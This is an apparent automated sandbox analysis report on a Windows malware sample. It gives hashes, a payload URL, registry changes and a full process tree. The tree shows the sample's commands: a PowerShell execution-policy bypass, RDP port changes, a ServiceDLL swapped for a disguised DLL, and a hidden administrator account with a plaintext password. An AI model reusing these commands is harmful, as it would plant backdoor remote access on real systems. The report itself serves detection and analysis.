Resubmissions
02-09-2021 16:57
210902-vgpzjadhhn 1002-09-2021 16:25
210902-tw1h5sage4 1002-09-2021 11:31
210902-9dk89x9wb2 1014-08-2021 13:56
210814-xdxpv1yk2x 10Analysis
-
max time kernel
1710s -
max time network
1741s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-09-2021 16:25
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10v20210408
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 4076 powershell.exe 19 4076 powershell.exe 20 4076 powershell.exe 21 4076 powershell.exe 23 4076 powershell.exe 25 4076 powershell.exe 27 4076 powershell.exe 29 4076 powershell.exe 31 4076 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4008 4008 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ymxdzjh2.nfm.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qaeldrbj.blu.ps1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF506.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF526.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF527.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF497.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF4F6.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3128 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 3836 powershell.exe Token: SeIncreaseQuotaPrivilege 3836 powershell.exe Token: SeSecurityPrivilege 3836 powershell.exe Token: SeTakeOwnershipPrivilege 3836 powershell.exe Token: SeLoadDriverPrivilege 3836 powershell.exe Token: SeSystemProfilePrivilege 3836 powershell.exe Token: SeSystemtimePrivilege 3836 powershell.exe Token: SeProfSingleProcessPrivilege 3836 powershell.exe Token: SeIncBasePriorityPrivilege 3836 powershell.exe Token: SeCreatePagefilePrivilege 3836 powershell.exe Token: SeBackupPrivilege 3836 powershell.exe Token: SeRestorePrivilege 3836 powershell.exe Token: SeShutdownPrivilege 3836 powershell.exe Token: SeDebugPrivilege 3836 powershell.exe Token: SeSystemEnvironmentPrivilege 3836 powershell.exe Token: SeRemoteShutdownPrivilege 3836 powershell.exe Token: SeUndockPrivilege 3836 powershell.exe Token: SeManageVolumePrivilege 3836 powershell.exe Token: 33 3836 powershell.exe Token: 34 3836 powershell.exe Token: 35 3836 powershell.exe Token: 36 3836 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeIncreaseQuotaPrivilege 3756 powershell.exe Token: SeSecurityPrivilege 3756 powershell.exe Token: SeTakeOwnershipPrivilege 3756 powershell.exe Token: SeLoadDriverPrivilege 3756 powershell.exe Token: SeSystemProfilePrivilege 3756 powershell.exe Token: SeSystemtimePrivilege 3756 powershell.exe Token: SeProfSingleProcessPrivilege 3756 powershell.exe Token: SeIncBasePriorityPrivilege 3756 powershell.exe Token: SeCreatePagefilePrivilege 3756 powershell.exe Token: SeBackupPrivilege 3756 powershell.exe Token: SeRestorePrivilege 3756 powershell.exe Token: SeShutdownPrivilege 3756 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeSystemEnvironmentPrivilege 3756 powershell.exe Token: SeRemoteShutdownPrivilege 3756 powershell.exe Token: SeUndockPrivilege 3756 powershell.exe Token: SeManageVolumePrivilege 3756 powershell.exe Token: 33 3756 powershell.exe Token: 34 3756 powershell.exe Token: 35 3756 powershell.exe Token: 36 3756 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeIncreaseQuotaPrivilege 1736 powershell.exe Token: SeSecurityPrivilege 1736 powershell.exe Token: SeTakeOwnershipPrivilege 1736 powershell.exe Token: SeLoadDriverPrivilege 1736 powershell.exe Token: SeSystemProfilePrivilege 1736 powershell.exe Token: SeSystemtimePrivilege 1736 powershell.exe Token: SeProfSingleProcessPrivilege 1736 powershell.exe Token: SeIncBasePriorityPrivilege 1736 powershell.exe Token: SeCreatePagefilePrivilege 1736 powershell.exe Token: SeBackupPrivilege 1736 powershell.exe Token: SeRestorePrivilege 1736 powershell.exe Token: SeShutdownPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeSystemEnvironmentPrivilege 1736 powershell.exe Token: SeRemoteShutdownPrivilege 1736 powershell.exe Token: SeUndockPrivilege 1736 powershell.exe Token: SeManageVolumePrivilege 1736 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3128 wrote to memory of 2916 3128 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 3128 wrote to memory of 2916 3128 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 2916 wrote to memory of 1308 2916 powershell.exe csc.exe PID 2916 wrote to memory of 1308 2916 powershell.exe csc.exe PID 1308 wrote to memory of 1312 1308 csc.exe cvtres.exe PID 1308 wrote to memory of 1312 1308 csc.exe cvtres.exe PID 2916 wrote to memory of 3836 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 3836 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 3756 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 3756 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 1736 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 1736 2916 powershell.exe powershell.exe PID 2916 wrote to memory of 2532 2916 powershell.exe reg.exe PID 2916 wrote to memory of 2532 2916 powershell.exe reg.exe PID 2916 wrote to memory of 2996 2916 powershell.exe reg.exe PID 2916 wrote to memory of 2996 2916 powershell.exe reg.exe PID 2916 wrote to memory of 3968 2916 powershell.exe reg.exe PID 2916 wrote to memory of 3968 2916 powershell.exe reg.exe PID 2916 wrote to memory of 2788 2916 powershell.exe net.exe PID 2916 wrote to memory of 2788 2916 powershell.exe net.exe PID 2788 wrote to memory of 576 2788 net.exe net1.exe PID 2788 wrote to memory of 576 2788 net.exe net1.exe PID 2916 wrote to memory of 196 2916 powershell.exe cmd.exe PID 2916 wrote to memory of 196 2916 powershell.exe cmd.exe PID 196 wrote to memory of 1300 196 cmd.exe cmd.exe PID 196 wrote to memory of 1300 196 cmd.exe cmd.exe PID 1300 wrote to memory of 3028 1300 cmd.exe net.exe PID 1300 wrote to memory of 3028 1300 cmd.exe net.exe PID 3028 wrote to memory of 2532 3028 net.exe net1.exe PID 3028 wrote to memory of 2532 3028 net.exe net1.exe PID 2916 wrote to memory of 2996 2916 powershell.exe cmd.exe PID 2916 wrote to memory of 2996 2916 powershell.exe cmd.exe PID 2996 wrote to memory of 3080 2996 cmd.exe cmd.exe PID 2996 wrote to memory of 3080 2996 cmd.exe cmd.exe PID 3080 wrote to memory of 3832 3080 cmd.exe net.exe PID 3080 wrote to memory of 3832 3080 cmd.exe net.exe PID 3832 wrote to memory of 1844 3832 net.exe net1.exe PID 3832 wrote to memory of 1844 3832 net.exe net1.exe PID 3916 wrote to memory of 1188 3916 cmd.exe net.exe PID 3916 wrote to memory of 1188 3916 cmd.exe net.exe PID 1188 wrote to memory of 2260 1188 net.exe net1.exe PID 1188 wrote to memory of 2260 1188 net.exe net1.exe PID 2300 wrote to memory of 2516 2300 cmd.exe net.exe PID 2300 wrote to memory of 2516 2300 cmd.exe net.exe PID 2516 wrote to memory of 1300 2516 net.exe net1.exe PID 2516 wrote to memory of 1300 2516 net.exe net1.exe PID 2008 wrote to memory of 2264 2008 cmd.exe net.exe PID 2008 wrote to memory of 2264 2008 cmd.exe net.exe PID 2264 wrote to memory of 4076 2264 net.exe net1.exe PID 2264 wrote to memory of 4076 2264 net.exe net1.exe PID 2972 wrote to memory of 1420 2972 cmd.exe net.exe PID 2972 wrote to memory of 1420 2972 cmd.exe net.exe PID 1420 wrote to memory of 3292 1420 net.exe net1.exe PID 1420 wrote to memory of 3292 1420 net.exe net1.exe PID 2068 wrote to memory of 1520 2068 cmd.exe net.exe PID 2068 wrote to memory of 1520 2068 cmd.exe net.exe PID 1520 wrote to memory of 2172 1520 net.exe net1.exe PID 1520 wrote to memory of 2172 1520 net.exe net1.exe PID 3980 wrote to memory of 1300 3980 cmd.exe net.exe PID 3980 wrote to memory of 1300 3980 cmd.exe net.exe PID 1300 wrote to memory of 196 1300 net.exe net1.exe PID 1300 wrote to memory of 196 1300 net.exe net1.exe PID 2972 wrote to memory of 3968 2972 cmd.exe WMIC.exe PID 2972 wrote to memory of 3968 2972 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A23.tmp" "c:\Users\Admin\AppData\Local\Temp\wxut4r0f\CSC249ECC34788B4231A934D2558BAC15C4.TMP"4⤵PID:1312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2532
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2996 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3968
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:576
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2532
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1844
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2972
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2264
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2260
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc N9Xm3ZCO /add1⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc N9Xm3ZCO /add2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc N9Xm3ZCO /add3⤵PID:1300
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:4076
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:3292
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2172
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc N9Xm3ZCO1⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc N9Xm3ZCO2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc N9Xm3ZCO3⤵PID:196
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:3968
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1256
